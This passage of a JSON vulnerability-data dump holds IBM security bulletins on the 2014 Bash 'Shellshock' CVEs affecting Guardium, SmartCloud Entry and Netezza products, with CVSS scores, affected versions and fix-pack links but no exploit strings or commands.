"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-02-23T17:14:38", "id": "9362FDC04C7CF0E7E11E00C238107A825074E1BBD7D4631CDE9FBBBA3D068B3A", "href": "https://www.ibm.com/support/pages/node/252417", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM InfoSphere Guardium Database Activity Monitoring.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. 
\n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. 
An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM InfoSphere Guardium Database Activity Monitoring versions 8.2, 9.0, 9.1 both 32bit and 64bit \n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nIBM InfoSphere Guardium Database Activity Monitoring| 8.2| \n| [_http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-8.2p242_Advisories_2209_2230&includeSupersedes=0&source=fc_](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-8.2p242_Advisories_2209_2230&includeSupersedes=0&source=fc>) \nIBM InfoSphere Guardium Database Activity 
Monitoring| 9.x 32bit and 64bit| \n| [_http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-9.0p1061_Advisories_2209_2230&includeSupersedes=0&source=fc_](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-9.0p1061_Advisories_2209_2230&includeSupersedes=0&source=fc>) \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\nCVSS Guide -<http://www.first.org/cvss/v2/guide> \n[__On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/psirt>) \n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n30 September 2014\n\n*The CVSS Environment Score is customer environment 
specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSMPHH\",\"label\":\"IBM Security Guardium\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.1;9.0;8.2\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-16T10:15:46", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM InfoSphere Guardium Database Activity Monitoring (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-07-16T10:15:46", "id": "6BED381F0625A1CEE6FF30731B3F37C8E1BC1D95ED40906A48FF91875BFEA753", "href": "https://www.ibm.com/support/pages/node/252275", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM SmartCloud Entry appliance.\n\n## Vulnerability Details\n\nCVE-ID: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96153> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-7169](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. 
An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96209> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-7186](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96237> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-7187](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96238> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-6277](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. 
An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96686> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-6278](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96687> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Starter Kit for Cloud 2.2.0. 
\n\nIBM SmartCloud Entry appliance versions 2.3.0, 2.4.0, 3.1.0, and 3.2.0.\n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nIBM Starter Kit for Cloud| 2.2.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+Starter+Kit+for+Cloud&function=fixid&fixids=2.2.0.1-IBM-SKC_APPL-FP001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+Starter+Kit+for+Cloud&function=fixid&fixids=2.2.0.1-IBM-SKC_APPL-FP001>) \nIBM SmartCloud Entry appliance| 2.3.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.3.0.1-IBM-SCE_APPL-FP001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.3.0.1-IBM-SCE_APPL-FP001>) \nIBM SmartCloud Entry appliance| 2.4.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.4.0.1-IBM-SCE_APPL-FP001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.4.0.1-IBM-SCE_APPL-FP001>) \nIBM SmartCloud Entry appliance| 3.1.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.1.0.4-IBM-SCE_APPL-FP06](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.1.0.4-IBM-SCE_APPL-FP06>) \nIBM SmartCloud Entry appliance| 3.2.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.2.0.3-IBM-SCE_APPL-FP06](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.2.0.3-IBM-SCE_APPL-FP06>) \n \nIBM recommends that you review your entire environment to 
identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[Subscribe to Security Bulletins](<http://www.ibm.com/support/mynotifications>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n31 October 2014: Updated description, CVSS Base Score, and CVSS Vector for CVE-2014-7186 and CVE-2014-7187. \n2 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SST55W\",\"label\":\"IBM Cloud Manager with OpenStack\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.3;2.4;3.1;3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-19T00:49:12", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2020-07-19T00:49:12", "id": "0684E6CA4C2678854DD2AF881EFBA469B9153F9B25226D0E89F7A8E363B90191", "href": "https://www.ibm.com/support/pages/node/679549", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM Netezza Host Management.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. 
\n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. 
An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nAll IBM PureData System for Analytics (Netezza) appliances operating on RedHat 5.3-5.10 and RedHat 6.2-6.5.\n\n## Remediation/Fixes\n\nIBM Netezza Host Management\n\n| 5.3.1| None| [http://www-933.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=5.3.1.0-IM-Netezza-HOSTMGMT-fp89859&continue=1](<http://www-933.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=5.3.1.0-IM-Netezza-HOSTMGMT-fp89859&continue=1>) \n---|---|---|--- \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. 
\n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n31 October 2014: Updated for revised CVSS base scores \n07 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSULQD\",\"label\":\"IBM PureData System\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Administration\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"1.0.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-18T03:10:29", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM Netezza Host Management (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2019-10-18T03:10:29", "id": "BADBBFD3B80B37BA80822E3D89F7CE0842CD6F0C0F9476386BC6B381BF85302E", "href": "https://www.ibm.com/support/pages/node/253033", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
